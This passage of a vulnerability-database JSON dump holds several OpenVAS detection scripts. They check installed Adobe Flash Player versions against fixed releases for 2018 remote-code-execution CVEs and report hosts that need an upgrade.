location\";\n}\n\nif(version_is_less(version:vers, test_version:\"29.0.0.113\")) {\n report = report_fixed_ver(file_checked:path, file_version:vers, vulnerable_range:\"Less than 29.0.0.113\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:13:51", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-03-14T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Windows (apsb18-05)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310813024", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813024", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Windows (apsb18-05)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813024\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4920\", \"CVE-2018-4919\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:17:28 +0530 (Wed, 14 Mar 2018)\");\n script_name(\"Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Windows (apsb18-05)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to a type confusion\n error and use-after-free error in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.161 and\n earlier on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 29.0.0.113 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.161\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"29.0.0.113\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T20:59:01", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-03-14T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities(apsb18-05)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310813027", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813027", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities(apsb18-05)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813027\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4920\", \"CVE-2018-4919\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:17:28 +0530 (Wed, 14 Mar 2018)\");\n script_name(\"Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities(apsb18-05)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to a type confusion\n error and use-after-free error in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow an attacker to execute arbitrary code on affected system and take\n control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.161 and\n earlier within Google Chrome on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 29.0.0.113 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.161\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"29.0.0.113\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:14:18", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-02-02T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities(apsa18-01)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310812686", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812686", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities(apsa18-01)-Windows\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812686\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4878\", \"CVE-2018-4877\");\n script_bugtraq_id(102893, 102930);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-02-02 11:08:19 +0530 (Fri, 02 Feb 2018)\");\n script_name(\"Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities(apsa18-01)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n use-after-free errors in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.137 and\n earlier within Google Chrome on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 28.0.0.161, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.137\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.161\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-15T17:01:59", "description": "This host is installed with Adobe Flash Player\n within Microsoft Edge or Internet Explorer and is prone to multiple remote code\n execution vulnerabilities.", "cvss3": {}, "published": "2018-02-02T00:00:00", "type": "openvas", "title": "Microsoft IE And Microsoft Edge Flash Player Multiple RCE Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "modified": "2020-05-13T00:00:00", "id": "OPENVAS:1361412562310812689", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812689", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IE And Microsoft Edge Flash Player Multiple RCE Vulnerabilities\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812689\");\n script_version(\"2020-05-13T14:08:32+0000\");\n script_cve_id(\"CVE-2018-4878\", \"CVE-2018-4877\");\n script_bugtraq_id(102893, 102930);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-13 14:08:32 +0000 (Wed, 13 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-02 11:18:19 +0530 (Fri, 02 Feb 2018)\");\n script_name(\"Microsoft IE And Microsoft Edge Flash Player Multiple RCE Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_flash_player_within_ie_edge_detect.nasl\");\n script_mandatory_keys(\"AdobeFlash/IE_or_EDGE/Installed\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n within Microsoft Edge or Internet Explorer and is prone to multiple remote code\n execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n use-after-free errors in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player within Microsoft Edge or\n Internet Explorer on,\n\n Windows 10 Version 1511 for x32/x64 Edition,\n\n Windows 10 Version 1607 for x32/x64 Edition,\n\n Windows 10 Version 1703 for x32/x64 Edition,\n\n Windows 10 Version 1709 for x32/x64 Edition,\n\n Windows 10 x32/x64 Edition,\n\n Windows 8.1 for x32/x64 Edition and\n\n Windows Server 2012/2012 R2/2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more\n information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012:1, win2012R2:1, win10:1,\n win10x64:1, win2016:1) <= 0)\n exit(0);\n\ncpe_list = make_list(\"cpe:/a:adobe:flash_player_internet_explorer\", \"cpe:/a:adobe:flash_player_edge\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\nif(path) {\n path = path + \"\\Flashplayerapp.exe\";\n} else {\n path = \"Could not find the install location\";\n}\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.137\")) {\n report = report_fixed_ver(file_checked:path, file_version:vers, vulnerable_range:\"Less than 28.0.0.161\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:14:41", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-02-02T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310812687", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812687", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812687\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4878\", \"CVE-2018-4877\");\n script_bugtraq_id(102893, 102930);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-02-02 11:10:37 +0530 (Fri, 02 Feb 2018)\");\n script_name(\"Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n use-after-free errors in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.137 and\n earlier within Google Chrome on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 28.0.0.161, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Lin/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.137\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.161\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:14:05", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-02-02T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310812685", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812685", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812685\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4878\", \"CVE-2018-4877\");\n script_bugtraq_id(102893, 102930);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-02-02 11:04:01 +0530 (Fri, 02 Feb 2018)\");\n script_name(\"Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n use-after-free errors in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.137 and\n earlier on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 28.0.0.161, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.137\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.161\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:14:12", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-02-02T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310812683", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812683", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Windows\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812683\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4878\", \"CVE-2018-4877\");\n script_bugtraq_id(102893, 102930);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-02-02 10:51:19 +0530 (Fri, 02 Feb 2018)\");\n script_name(\"Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n use-after-free errors in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.137 and\n earlier on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 28.0.0.161, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.137\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.161\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:13:56", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-02-02T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Mac OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310812684", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812684", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Mac OS X\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812684\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4878\", \"CVE-2018-4877\");\n script_bugtraq_id(102893, 102930);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 